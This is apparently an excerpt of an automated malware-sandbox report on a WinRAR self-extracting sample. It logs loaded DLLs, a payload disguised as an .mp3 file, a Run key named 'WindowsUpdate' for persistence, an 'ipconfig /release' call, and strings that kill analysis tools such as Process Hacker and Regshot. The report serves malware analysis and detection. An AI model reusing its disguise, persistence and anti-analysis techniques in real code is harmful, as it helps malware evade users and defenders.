                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: pcacli.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntshrui.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cscapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: ngPebbPhbp.exe Static file information: File size 1684188 > 1048576
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ngPebbPhbp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
                Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00375D78
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6003703
                Source: ngPebbPhbp.exe Static PE information: section name: .didat
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26680 push ecx; ret 0_2_00B26693
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25773 push ecx; ret 0_2_00B25786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003C0330 push edi; ret 7_2_003C0333
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390E06 push ecx; ret 7_2_00390E19
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038DBFE push eax; iretd 7_2_0038DC01
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563170 push ecx; iretd 14_2_0556317C
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563130 pushad ; ret 14_2_05563138
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055651E2 push eax; retf 14_2_055651F1
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C62 push es; retf 14_2_05563C91
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C95 push es; retf 14_2_05563C91
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561F50 push eax; retf 14_2_05561F51
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565777 push esi; ret 14_2_05565782
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055637A2 push ebp; iretd 14_2_055637A3
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05564E69 push ebx; iretd 14_2_05564E6A
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565A80 push edx; ret 14_2_05565A81
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284B00 push edx; ret 15_3_03284B01
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282D15 push es; retf 15_3_03282D11
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821B0 pushad ; ret 15_3_032821B8
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821F0 push ecx; iretd 15_3_032821FC
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032847F7 push esi; ret 15_3_03284802
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280FD0 push eax; retf 15_3_03280FD1
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282822 push ebp; iretd 15_3_03282823
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284262 push eax; retf 15_3_03284271
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03283EE9 push ebx; iretd 15_3_03283EEA
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282CE2 push es; retf 15_3_03282D11
                Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5FF00 push eax; ret 15_2_05A5FF2E
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DE0332 push edi; ret 16_2_00DE0333
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0E06 push ecx; ret 16_2_00DB0E19
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DADC00 push eax; iretd 16_2_00DADC01
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF61A3 push CF1CE871h; iretd 17_2_01BF61AA
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF602F push D090E871h; iretd 17_2_01BF6036

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exe
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3; Code function: 7_2_004025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_004025A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3; Code function: 7_2_0038FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_0038FC8A
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe; Code function: 16_2_00E225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00E225A0
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe; Code function: 16_2_00DAFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00DAFC8A
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\OpenWith.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\OpenWith.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe; Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: qwlvpmrupf.mp3 PID: 7640, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8072, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 8188, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: qwlvpmrupf.mp3.exe PID: 4092, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe; Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Source: C:\Windows\SysWOW64\OpenWith.exe; API/Special instruction interceptor: Address: 7FFE2220D044
                Source: C:\Windows\SysWOW64\OpenWith.exe; API/Special instruction interceptor: Address: 5A6A83A
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSHACKER.EXE)_M
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217573693.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215926455.00000000019A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")C
                Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: REGSHOT.EXESEQ
                Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
